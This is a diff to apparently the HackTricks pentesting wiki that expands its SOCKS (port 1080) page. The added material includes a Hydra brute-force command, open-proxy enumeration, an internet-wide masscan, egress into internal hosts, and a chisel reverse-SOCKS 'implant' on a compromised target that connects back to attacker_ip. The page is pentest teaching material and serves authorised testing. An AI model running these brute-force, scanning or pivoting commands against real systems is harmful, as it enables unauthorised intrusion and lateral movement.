Research Update Enhanced src/network-services-pentesting/108...

src/SUMMARY.md

@@ -375,6 +375,7 @@
     - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
   - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
   - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+  - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
   - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
   - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
   - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)

src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md

@@ -81,3 +81,4 @@ adb shell ime help
 - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
 - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
 
+{{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/1080-pentesting-socks.md

@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets, operating at the session layer (Layer 5) of the OSI model.
+**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets (via the `UDP ASSOCIATE` command), operating at the session layer (Layer 5) of the OSI model. When tooling supports the `socks5h` scheme, DNS resolution is forced through the proxy, preventing local DNS leaks and making it harder to fingerprint the originating host.
 
 **Default Port:** 1080
 
@@ -42,6 +42,46 @@ PORT     STATE SERVICE
 |_    Performed 1921 guesses in 6 seconds, average tps: 320
 ```
 
+#### Hydra module
+
+```bash
+hydra -L users.txt -P passwords.txt -s 1080 -t 16 -V <ip> socks5
+```
+
+### Method & open-proxy enumeration
+
+```bash
+nmap -sV --script socks-methods,socks-open-proxy -p 1080 <ip>
+```
+
+`socks-methods` forces the server to list supported authentication types, while `socks-open-proxy` attempts an outbound CONNECT to confirm whether the service can be abused as a relay.
+
+#### Raw handshake check
+
+```bash
+printf '\x05\x01\x00' | nc -nv <ip> 1080
+```
+
+A `\x05 01 00` response indicates SOCKS5 offering "no authentication". Any `\x00` followed by `\x02` means username/password is required, which is useful for quickly fingerprinting exposed devices in scripts.
+
+### Quick egress validation
+
+```bash
+curl --socks5-hostname <ip>:1080 https://ifconfig.me
+curl --socks5-hostname user:pass@<ip>:1080 http://internal.target
+```
+
+Use `--socks5-hostname` (or `socks5h://` URLs) so DNS resolution happens remotely. Pair it with `proxychains4 -q nmap -sT -Pn --top-ports 200 <internal-host>` to verify whether the proxy truly provides internal reach.
+
+### Internet-wide discovery / fingerprinting
+
+```bash
+masscan 0.0.0.0/0 -p1080 --banners --rate 100000 -oX socks.xml
+```
+
+Feed results back into NSE, `zgrab2`, or custom python scripts to prioritize promising hosts (e.g., banner strings like `3proxy`, `Dante`, `MikroTik`).
+
+
 ## Tunneling and Port Forwarding
 
 ### Basic proxychains usage
@@ -64,9 +104,38 @@ With auth
 socks5 10.10.10.10 1080 username password
 ```
 
-#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md)
+Pro tip: switch to `dynamic_chain`, enable `proxy_dns`, and shorten `tcp_read_time_out`/`tcp_connect_time_out` to make brute-force enumeration over latent tunnels far more reliable.
 
-{{#include ../banners/hacktricks-training.md}}
+### SSH dynamic SOCKS (cloud / Kubernetes pivoting)
 
+```bash
+ssh -D 1080 -q -N attacker@bastion.example
+export HTTPS_PROXY=socks5h://127.0.0.1:1080
+kubectl get pods
+```
+
+Setting `socks5h://` (or `--socks5-hostname` in curl) forces the bastion to resolve cluster hostnames, eliminating local DNS leakage. You can permanently bind the proxy to a specific `kubectl` context with:
+
+```bash
+kubectl config set-cluster <name> --proxy-url=socks5h://127.0.0.1:1080
+```
 
+### Rapid SOCKS implants for pivoting
 
+```bash
+# Attacker
+chisel server --reverse --port 9000 --socks5
+
+# Compromised target
+chisel client attacker_ip:9000 R:socks
+```
+
+This spawns a reverse SOCKS5 tunnel entirely over a single outbound TCP link, perfect for environments with egress filtering. Combine it with `proxychains` on the attacker side to route RDP/SMB enumeration through the freshly established tunnel.
+
+#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md)
+
+## References
+
+- [Use a SOCKS5 Proxy to Access the Kubernetes API (Kubernetes Docs, 2024)](https://kubernetes.io/docs/tasks/extend-kubernetes/socks5-proxy-access-api)
+
+{{#include ../banners/hacktricks-training.md}}